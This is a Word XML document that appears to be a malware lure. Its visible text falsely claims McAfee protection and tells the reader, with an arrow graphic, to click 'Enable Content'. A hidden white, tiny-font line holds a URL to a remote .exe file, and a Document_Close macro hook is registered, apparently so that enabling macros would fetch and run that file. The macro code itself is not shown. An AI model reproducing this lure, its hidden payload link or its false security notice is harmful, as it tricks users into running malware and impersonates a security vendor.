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BD6" w:rsidRDefault="00BC0D6C" w:rsidP="00585BD6">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Adobe Gothic Std B" w:eastAsia="Adobe Gothic Std B" w:hAnsi="Adobe Gothic Std B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr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Up Arrow 2" o:spid="_x0000_s1026" type="#_x0000_t68" style="position:absolute;left:0;text-align:left;margin-left:-26.25pt;margin-top:-51pt;width:20.25pt;height:42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" fillcolor="#c0504d" strokecolor="#f2f2f2" strokeweight="3pt">
            <v:shadow on="t" color="#622423" opacity=".5" offset="1pt"/>
            <v:textbox style="layout-flow:vertical-ideographic"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585BD6" w:rsidRDefault="00585BD6" w:rsidP="00585BD6">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Adobe Gothic Std B" w:eastAsia="Adobe Gothic Std B" w:hAnsi="Adobe Gothic Std B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Adobe Gothic Std B" w:eastAsia="Adobe Gothic Std B" w:hAnsi="Adobe Gothic Std B" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This document has been protected by McAfee Secure office endpoint protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585BD6" w:rsidRDefault="00585BD6" w:rsidP="00585BD6">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Adobe Gothic Std B" w:eastAsia="Adobe Gothic Std B" w:hAnsi="Adobe Gothic Std B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Adobe Gothic Std B" w:eastAsia="Adobe Gothic Std B" w:hAnsi="Adobe Gothic Std B" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>To view the protected document, follow the Arrow above to ‘Enable Content’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585BD6" w:rsidRPr="00A41D8A" w:rsidRDefault="00585BD6" w:rsidP="00585BD6">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="3810000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 1" descr="Description: Description: Description: ery70I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ery70IO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863" w:rsidRDefault="002D5863" w:rsidP="002D5863">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D5863" w:rsidRDefault="002D5863" w:rsidP="002D5863">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D5863" w:rsidRDefault="002D5863" w:rsidP="002D5863">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D5863" w:rsidRDefault="002D5863" w:rsidP="002D5863">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B2117F" w:rsidRPr="002B1974" w:rsidRDefault="002D5863" w:rsidP="002D5863">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B1974">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t>https://a.pomf.cat/wjqdgc.exe\</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00B2117F" w:rsidRPr="002B1974" w:rsidSect="006C7A4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D6C" w:rsidRDefault="00BC0D6C" w:rsidP="00B2117F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BC0D6C" w:rsidRDefault="00BC0D6C" w:rsidP="00B21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17F" w:rsidRDefault="00B2117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17F" w:rsidRPr="00B2117F" w:rsidRDefault="00B2117F">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:rPr>
        <w:rFonts w:ascii="Andalus" w:hAnsi="Andalus" w:cs="Andalus"/>
        <w:color w:val="92CDDC" w:themeColor="accent5" w:themeTint="99"/>
        <w:sz w:val="8"/>
        <w:szCs w:val="8"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00B2117F">
      <w:rPr>
        <w:rFonts w:ascii="Andalus" w:hAnsi="Andalus" w:cs="Andalus"/>
        <w:color w:val="92CDDC" w:themeColor="accent5" w:themeTint="99"/>
        <w:sz w:val="8"/>
        <w:szCs w:val="8"/>
      </w:rPr>
      <w:t>****</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00B2117F" w:rsidRDefault="00B2117F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17F" w:rsidRDefault="00B2117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D6C" w:rsidRDefault="00BC0D6C" w:rsidP="00B2117F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BC0D6C" w:rsidRDefault="00BC0D6C" w:rsidP="00B21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17F" w:rsidRDefault="00B2117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17F" w:rsidRDefault="00B2117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17F" w:rsidRDefault="00B2117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5179"/>
    <w:rsid w:val="00032C4A"/>
    <w:rsid w:val="000479B5"/>
    <w:rsid w:val="0005469D"/>
    <w:rsid w:val="000A2895"/>
    <w:rsid w:val="000C27B4"/>
    <w:rsid w:val="000F240D"/>
    <w:rsid w:val="00152E91"/>
    <w:rsid w:val="00184399"/>
    <w:rsid w:val="00190BB3"/>
    <w:rsid w:val="001F1D4A"/>
    <w:rsid w:val="00281B7B"/>
    <w:rsid w:val="002B1974"/>
    <w:rsid w:val="002D5863"/>
    <w:rsid w:val="002F2D0B"/>
    <w:rsid w:val="00344926"/>
    <w:rsid w:val="003A2FCF"/>
    <w:rsid w:val="00410C3B"/>
    <w:rsid w:val="0048381E"/>
    <w:rsid w:val="004911D5"/>
    <w:rsid w:val="00506021"/>
    <w:rsid w:val="00532535"/>
    <w:rsid w:val="00535365"/>
    <w:rsid w:val="00575224"/>
    <w:rsid w:val="0058265F"/>
    <w:rsid w:val="00585BD6"/>
    <w:rsid w:val="005D5B87"/>
    <w:rsid w:val="00602856"/>
    <w:rsid w:val="006248F5"/>
    <w:rsid w:val="0063696F"/>
    <w:rsid w:val="006B579B"/>
    <w:rsid w:val="006C7A40"/>
    <w:rsid w:val="00714D9E"/>
    <w:rsid w:val="007256AC"/>
    <w:rsid w:val="007477C9"/>
    <w:rsid w:val="007A404D"/>
    <w:rsid w:val="007B2562"/>
    <w:rsid w:val="00846977"/>
    <w:rsid w:val="0085185F"/>
    <w:rsid w:val="00855179"/>
    <w:rsid w:val="00857A76"/>
    <w:rsid w:val="00870254"/>
    <w:rsid w:val="00874EDA"/>
    <w:rsid w:val="0090357B"/>
    <w:rsid w:val="0091634B"/>
    <w:rsid w:val="00930B0A"/>
    <w:rsid w:val="00955FCE"/>
    <w:rsid w:val="00A21DAE"/>
    <w:rsid w:val="00A301CD"/>
    <w:rsid w:val="00A62D13"/>
    <w:rsid w:val="00AA7F8E"/>
    <w:rsid w:val="00B11CED"/>
    <w:rsid w:val="00B2117F"/>
    <w:rsid w:val="00B435EA"/>
    <w:rsid w:val="00B537F2"/>
    <w:rsid w:val="00BA3A48"/>
    <w:rsid w:val="00BC0D6C"/>
    <w:rsid w:val="00BE0CF0"/>
    <w:rsid w:val="00BF238E"/>
    <w:rsid w:val="00BF535D"/>
    <w:rsid w:val="00C86757"/>
    <w:rsid w:val="00C9304B"/>
    <w:rsid w:val="00CA14D5"/>
    <w:rsid w:val="00D456DC"/>
    <w:rsid w:val="00D72C63"/>
    <w:rsid w:val="00D92C5B"/>
    <w:rsid w:val="00D940C1"/>
    <w:rsid w:val="00DD3A54"/>
    <w:rsid w:val="00E4116C"/>
    <w:rsid w:val="00E61A71"/>
    <w:rsid w:val="00EA45CA"/>
    <w:rsid w:val="00F0722C"/>
    <w:rsid w:val="00F877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A40"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B211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8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77D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211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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B21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2117F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B21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1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8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Balloon Text Char"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Textedebulles"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F877D9"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16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Close/>
  </wne:docEvents>
  <wne:mcds>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.DOCUMENT_CLOSE" wne:name="Project.ThisDocument.Document_Clos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7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319F0-E4B5-4FF5-9E70-63E1E46D5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Hravat</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-02T13:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-09T13:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>